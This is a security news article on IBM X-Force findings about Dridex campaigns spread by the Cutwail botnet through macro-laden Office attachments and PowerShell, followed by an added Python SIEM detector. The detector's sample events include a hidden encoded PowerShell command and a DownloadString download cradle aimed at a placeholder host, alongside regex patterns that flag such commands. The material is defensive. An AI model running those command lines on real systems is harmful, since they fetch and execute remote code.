
Dridex Network Attack Campaign Delivered by Cutwail Botnet and Poisonous PowerShell Scripts

The IBM X-Force threat intelligence team recently reported a sharp and continuing increase in Dridex-related network attacks, all of them delivered through the Cutwail botnet.

According to the analysts, Dridex arrives as a second-stage infector: the initial document or spreadsheet reaches the victim by email with booby-trapped macros, and those macros fetch Dridex.

Alongside these, IBM X-Force is also seeing more limited campaigns that are active in Italy and Japan.

Summon PowerShell to Download Dridex

The initial infection vector in these attacks was malspam: recipients received unsolicited emails carrying Microsoft Office file attachments.

These attachments are typically delivered through the Cutwail botnet, which remains one of the most prominent spamming infrastructures in the cybercrime arena.

Cutwail was named the most extensive spam botnet of its kind in 2009, and in 2021 it is still sending spam on behalf of elite malware-wielding groups.

Since June 2020, IBM X-Force has observed that roughly 34% of all PowerShell-based attacks were ultimately associated with a Dridex payload.

Dridex: a Banking Trojan or a Ransomware?

A question analysts often ask is whether Dridex is a banking Trojan or ransomware. The X-Force researchers settle it: Dridex is a banking Trojan.

In many cases, Dridex's operators are known as the 'Evil Corp' group, and the malware uses its full capability, including web injections, to steal every credential it can from its current victims.

There are also many documented cases in which Dridex is operated as a bot-herding tool and a capable information stealer.

Targeted sector and what is next for Dridex?

In the managed security services networks X-Force monitors, the most targeted sector is health care, which X-Force identifies as one of the top targets in the overall growth of PowerShell attacks.

Health care is followed by the financial sector and by retailers; health care is targeted most heavily because of the recent pandemic situation.

According to the analysts, Dridex also frequently does business with other cybercrime groups rooted in the elite criminal arena of eastern Europe.

What, then, is next for Dridex?

In early January 2021, Dridex appears to be exploring several avenues: researchers have observed it spreading through the Rig Exploit Kit, the Cutwail botnet, and, in some cases, the QakBot botnet.

Mitigations

The threat intelligence team suggests the following mitigations:

  • Employees should be trained on the latest phishing methods so they can recognize suspicious emails carrying malicious attachments.
  • Security teams should apply appropriate YARA rules to detect the use of malicious PowerShell.
  • Organizations should tune their SIEM with improved detection of malicious PowerShell.
  • Organizations should consider a managed detection and response solution to secure their endpoints.
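As an added illustration of the SIEM-tuning point above (example code, not from the article or from IBM X-Force): a small Python detector run over constructed process-creation events in the shape of Sysmon/4688 telemetry, flagging the chain the article describes, an Office application spawning PowerShell with encoded-command, hidden-window or download-cradle arguments. The field names, paths and command lines are assumed and constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events shaped like Windows process-creation telemetry
# (parent image, child image, command line). Not real logs from the campaign.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgA..."},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a')"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Argument patterns commonly seen in macro-launched PowerShell downloaders.
SUSPICIOUS_ARGS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"-e(nc(odedcommand)?)?\b", re.I), "encoded command"),
    (re.compile(r"\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b", re.I),
     "download cradle"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop(rofile)?\b", re.I), "no profile"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return detection reasons for one event; an empty list means benign."""
    reasons: List[str] = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    spawns_shell = image in SHELLS or "powershell" in cmd.lower()
    if parent in OFFICE_APPS and spawns_shell:
        reasons.append(f"office app {parent} spawned {image}")
    for pattern, label in SUSPICIOUS_ARGS:
        if pattern.search(cmd):
            reasons.append(label)
    return reasons


def detect(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every event that trips at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := score_event(e))]
```

A real deployment would key the same logic on the SIEM's own field names and add the macro-to-child-process chain as a correlation rule rather than a per-event match.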


Guru Baran

Gurubaran is the Co-Founder and Editor-in-Chief of CyberSecurityNews.com, specializing in vulnerability analysis, malware research, ransomware, and computer forensics.
